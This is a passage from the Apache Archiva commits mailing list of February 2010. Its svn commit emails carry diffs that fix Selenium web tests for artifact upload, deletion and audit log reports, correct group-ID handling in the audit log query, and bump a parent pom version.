deployed to repository '" + releasesRepo + "'" ); goToBrowsePage(); @@ -77,8 +73,7 @@ assertArtifactInfoPage( "1.0-SNAPSHOT/", releasesRepo, "archiva", "archiva-webapp", "1.0-SNAPSHOT", "jar" ); // upload a snapshot artifact to repository 'snapshots' - addArtifact( "continuum", "continuum-core", "1.0-SNAPSHOT", "jar", artifact.getPath(), - snapshotsRepo ); + addArtifact( "continuum", "continuum-core", "1.0-SNAPSHOT", "jar", path, snapshotsRepo ); assertTextPresent( "Artifact 'continuum:continuum-core:1.0-SNAPSHOT' was successfully deployed to repository '" + snapshotsRepo + "'" ); goToBrowsePage(); Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/listener/CaptureScreenShotsListener.java Fri Feb 12 13:47:29 2010 @@ -75,7 +75,7 @@ { selenium.windowMaximize(); File fileName = new File( targetPath, fileBaseName + ".png" ); - selenium.captureEntirePageScreenshot( fileName.getAbsolutePath(), "" ); + selenium.captureEntirePageScreenshot( fileName.getAbsolutePath(), "background=#FFFFFF" ); } catch ( RuntimeException e ) { Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArchivaTest.java Fri Feb 12 13:47:29 2010 @@ -1,6 +1,7 @@ package org.apache.archiva.web.test.parent; import java.io.File; +import java.io.IOException; import org.apache.archiva.web.test.XPathExpressionUtil; @@ -495,7 +496,25 @@ checkField( "generatePom" ); } - setFieldValue( "artifact", artifactFilePath ); + String path; + if ( artifactFilePath != null && artifactFilePath.trim().length() > 0 ) + { + File f = new File( artifactFilePath ); + try + { + path = f.getCanonicalPath(); + } + catch ( IOException e ) + { + path = f.getAbsolutePath(); + } + } + else + { + path = artifactFilePath; + } + + setFieldValue( "artifact", path ); setFieldValue( "repositoryId", repositoryId ); clickButtonWithValue( "Submit" ); Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java?rev=909410&r1=909409&r2=909410&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Fri Feb 12 13:47:29 2010 @@ -1,8 +1,6 @@ package org.apache.archiva.web.test.parent; -import java.io.File; - -public abstract class AbstractArtifactManagementTest +public abstract class AbstractArtifactManagementTest extends AbstractArchivaTest { @@ -32,9 +30,7 @@ public String getArtifactFilePath() { - File f = new File( "" ); - String artifactFilePath = f.getAbsolutePath(); - return artifactFilePath + "/src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar" ; + return "src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar"; } public String getRepositoryId() From [email protected] Fri Feb 12 14:19:23 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 35442 invoked from network); 12 Feb 2010 14:19:23 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 14:19:23 -0000 Received: (qmail 8199 invoked by uid 500); 12 Feb 2010 14:19:23 -0000 Delivered-To: [email protected] Received: (qmail 8142 invoked by uid 500); 12 Feb 2010 14:19:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8133 invoked by uid 99); 12 Feb 2010 14:19:23 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:19:23 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:19:21 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 0EDDA23889ED; Fri, 12 Feb 2010 14:19:00 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909422 - /archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Date: Fri, 12 Feb 2010 14:19:00 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 14:18:59 2010 New Revision: 909422 URL: http://svn.apache.org/viewvc?rev=909422&view=rev Log: use correct path Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=909422&r1=909421&r2=909422&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Fri Feb 12 14:18:59 2010 @@ -81,7 +81,7 @@ SNAPSHOT_ARTIFACTID=archiva-test SNAPSHOT_VERSION=1.0-SNAPSHOT SNAPSHOT_PACKAGING=jar -SNAPSHOT_ARTIFACTFILEPATH=test +SNAPSHOT_ARTIFACTFILEPATH=src/test/it-resources/snapshots/org/apache/maven/archiva/web/test/foo-bar/1.0-SNAPSHOT/foo-bar-1.0-SNAPSHOT.jar SNAPSHOT_REPOSITORYID=snapshots # REPOSITORIES From [email protected] Fri Feb 12 14:22:07 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36291 invoked from network); 12 Feb 2010 14:22:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 14:22:07 -0000 Received: (qmail 10692 invoked by uid 500); 12 Feb 2010 14:22:07 -0000 Delivered-To: [email protected] Received: (qmail 10637 invoked by uid 500); 12 Feb 2010 14:22:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10628 invoked by uid 99); 12 Feb 2010 14:22:07 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:22:07 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:22:06 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 22D5B23889DE; Fri, 12 Feb 2010 14:21:46 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909423 - /archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Date: Fri, 12 Feb 2010 14:21:46 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 14:21:45 2010 New Revision: 909423 URL: http://svn.apache.org/viewvc?rev=909423&view=rev Log: ensure delete tests continue working if earlier ones have failed Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java?rev=909423&r1=909422&r2=909423&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Fri Feb 12 14:21:45 2010 @@ -41,6 +41,7 @@ public void goToDeleteArtifactPage() { + login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); clickLinkWithText( "Delete Artifact" ); assertDeleteArtifactPage(); } From [email protected] Fri Feb 12 14:42:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 46506 invoked from network); 12 Feb 2010 14:42:56 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 14:42:56 -0000 Received: (qmail 38744 invoked by uid 500); 12 Feb 2010 14:42:56 -0000 Delivered-To: [email protected] Received: (qmail 38684 invoked by uid 500); 12 Feb 2010 14:42:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 38675 invoked by uid 99); 12 Feb 2010 14:42:56 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:42:56 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:42:55 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 7282923889DE; Fri, 12 Feb 2010 14:42:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909433 - /archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Date: Fri, 12 Feb 2010 14:42:34 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 14:42:33 2010 New Revision: 909433 URL: http://svn.apache.org/viewvc?rev=909433&view=rev Log: fix the audit log tests Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909433&r1=909432&r2=909433&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 14:42:33 2010 @@ -81,7 +81,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -101,7 +101,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -120,7 +120,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -141,23 +141,23 @@ clickLinkWithText( "Logout" ); - login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRolePassword() ); - goToAuditLogReports(); + login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRoleNewPassword() ); + + goToAuditLogReports(); assertAuditLogsReportPage(); - + selectValue( "repository", "all" ); submit(); - + assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); - + assertTextNotPresent( artifactId + "-" + version + "." + packaging ); - clickLinkWithText( "Logout" ); login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); } From [email protected] Fri Feb 12 14:47:33 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49673 invoked from network); 12 Feb 2010 14:47:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 14:47:33 -0000 Received: (qmail 48155 invoked by uid 500); 12 Feb 2010 14:47:33 -0000 Delivered-To: [email protected] Received: (qmail 48093 invoked by uid 500); 12 Feb 2010 14:47:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 48084 invoked by uid 99); 12 Feb 2010 14:47:33 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:47:33 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 14:47:30 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9DADA23889DE; Fri, 12 Feb 2010 14:47:09 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909436 - in /archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test: ./ src/test/testng/org/apache/archiva/web/test/ src/test/testng/org/apache/archiva/web/test/parent/ Date: Fri, 12 Feb 2010 14:47:09 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 14:47:09 2010 New Revision: 909436 URL: http://svn.apache.org/viewvc?rev=909436&view=rev Log: merge -r909422:909434 from trunk to fix Selenium tests Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/ (props changed) archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Propchange: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/ ------------------------------------------------------------------------------ --- svn:mergeinfo (added) +++ svn:mergeinfo Fri Feb 12 14:47:09 2010 @@ -0,0 +1,6 @@ +/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test:721945-723577 +/archiva/branches/MRM-541/archiva-modules/archiva-web/archiva-webapp-test:686983-687034 +/archiva/branches/archiva-search-improvements/archiva-modules/archiva-web/archiva-webapp-test:723609-726925 +/archiva/branches/archiva-struts2/archiva-modules/archiva-web/archiva-webapp-test:699795-705848 +/archiva/tags/archiva-1.3/archiva-modules/archiva-web/archiva-webapp-test:898632 +/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test:825850-909070,909423-909434 Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909436&r1=909435&r2=909436&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 14:47:09 2010 @@ -81,7 +81,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -101,7 +101,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -120,7 +120,7 @@ assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); @@ -141,23 +141,23 @@ clickLinkWithText( "Logout" ); - login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRolePassword() ); - goToAuditLogReports(); + login( getProperty( "REPOMANAGER_INTERNAL_USERNAME" ), getUserRoleNewPassword() ); + + goToAuditLogReports(); assertAuditLogsReportPage(); - + selectValue( "repository", "all" ); submit(); - + assertAuditLogsReportPage(); assertTextPresent( "Results" ); assertTextNotPresent( "No audit logs found." ); - assertTextPresent( "test-1.0.jar" ); + assertTextPresent( "testAddArtifactValidValues-1.0.jar" ); assertTextPresent( "Uploaded File" ); assertTextPresent( "internal" ); assertTextPresent( "admin" ); - + assertTextNotPresent( artifactId + "-" + version + "." + packaging ); - clickLinkWithText( "Logout" ); login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); } Modified: archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java URL: http://svn.apache.org/viewvc/archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java?rev=909436&r1=909435&r2=909436&view=diff ============================================================================== --- archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java (original) +++ archiva/branches/MRM-1025/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/parent/AbstractArtifactManagementTest.java Fri Feb 12 14:47:09 2010 @@ -41,6 +41,7 @@ public void goToDeleteArtifactPage() { + login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); clickLinkWithText( "Delete Artifact" ); assertDeleteArtifactPage(); } From [email protected] Fri Feb 12 15:21:08 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69572 invoked from network); 12 Feb 2010 15:21:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:21:08 -0000 Received: (qmail 8938 invoked by uid 500); 12 Feb 2010 15:21:08 -0000 Delivered-To: [email protected] Received: (qmail 8876 invoked by uid 500); 12 Feb 2010 15:21:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8862 invoked by uid 99); 12 Feb 2010 15:21:07 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:21:07 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:21:04 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 2E53C2388993; Fri, 12 Feb 2010 15:20:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909454 - in /archiva/trunk/archiva-modules/archiva-web: archiva-webapp-test/src/test/resources/ archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/ archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ Date: Fri, 12 Feb 2010 15:20:41 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: brett Date: Fri Feb 12 15:20:38 2010 New Revision: 909454 URL: http://svn.apache.org/viewvc?rev=909454&view=rev Log: [MRM-1304] Query using Group ID field in audit log report uses '/' as a separator instead of '.' Submitted by: Adelita L. Padilla (applied with modifications to test) Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties?rev=909454&r1=909453&r2=909454&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/resources/testng.properties Fri Feb 12 15:20:38 2010 @@ -106,3 +106,8 @@ # Browse - MRM-1278 test SNAPSHOTS_REPOSITORY=snapshots RELEASES_REPOSITORY=releases + +# Audit Log Report - MRM-1304 +AUDITLOG_GROUPID=group.id +AUDITLOG_EXPECTED_ARTIFACT=group/id/test/1.0/test-1.0.jar + Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java?rev=909454&r1=909453&r2=909454&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp-test/src/test/testng/org/apache/archiva/web/test/AuditLogsReportTest.java Fri Feb 12 15:20:38 2010 @@ -161,4 +161,27 @@ clickLinkWithText( "Logout" ); login( getProperty( "ADMIN_USERNAME" ), getProperty( "ADMIN_PASSWORD" ) ); } + + @Test (dependsOnMethods = { "testAddArtifactValidValues" }, groups = "requiresUpload") + public void testViewAuditLogsReportForGroupId() + { + String groupId = getProperty("AUDITLOG_GROUPID"); + String artifactId = getProperty("ARTIFACTID"); + String version = getProperty("VERSION"); + String packaging = getProperty("PACKAGING"); + String repositoryId = getProperty("REPOSITORYID"); + String expectedArtifact = getProperty("AUDITLOG_EXPECTED_ARTIFACT"); + + addArtifact( groupId, artifactId, version, packaging, getProperty( "SNAPSHOT_ARTIFACTFILEPATH" ), repositoryId ); + + goToAuditLogReports(); + + selectValue( "repository", repositoryId ); + setFieldValue( "groupId", groupId ); + submit(); + + assertAuditLogsReportPage(); + assertTextPresent( expectedArtifact ); + assertTextPresent( repositoryId ); + } } Modified: archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java URL: http://svn.apache.org/viewvc/archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java?rev=909454&r1=909453&r2=909454&view=diff ============================================================================== --- archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java (original) +++ archiva/trunk/archiva-modules/archiva-web/archiva-webapp/src/main/java/org/apache/maven/archiva/web/action/reports/ViewAuditLogReportAction.java Fri Feb 12 15:20:38 2010 @@ -160,7 +160,8 @@ if ( groupId != null && !"".equals( groupId.trim() ) ) { - artifact = groupId + ( ( artifactId != null && !"".equals( artifactId.trim() ) ) ? ( "/" + artifactId + "/%" ) : "%" ); + String modifiedGroupId = groupId.replace( ".", "/" ); + artifact = modifiedGroupId + ( ( artifactId != null && !"".equals( artifactId.trim() ) ) ? ( "/" + artifactId + "/%" ) : "%" ); } else { From [email protected] Fri Feb 12 15:22:16 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70157 invoked from network); 12 Feb 2010 15:22:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 12 Feb 2010 15:22:16 -0000 Received: (qmail 10625 invoked by uid 500); 12 Feb 2010 15:22:16 -0000 Delivered-To: [email protected] Received: (qmail 10563 invoked by uid 500); 12 Feb 2010 15:22:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.archiva.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10554 invoked by uid 99); 12 Feb 2010 15:22:16 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:22:16 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 12 Feb 2010 15:22:15 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 86DE52388993; Fri, 12 Feb 2010 15:21:55 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r909455 - /archiva/trunk/pom.xml Date: Fri, 12 Feb 2010 15:21:55 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: brett Date: Fri Feb 12 15:21:53 2010 New Revision: 909455 URL: http://svn.apache.org/viewvc?rev=909455&view=rev Log: update parent Modified: archiva/trunk/pom.xml Modified: archiva/trunk/pom.xml URL: http://svn.apache.org/viewvc/archiva/trunk/pom.xml?rev=909455&r1=909454&r2=909455&view=diff ============================================================================== --- archiva/trunk/pom.xml (original) +++ archiva/trunk/pom.xml Fri Feb 12 15:21:53 2010 @@ -28,7 +28,7 @@ <parent> <groupId>org.apache.archiva</groupId> <artifactId>archiva-parent</artifactId> - <version>5</version> + <version>6-SNAPSHOT</version> 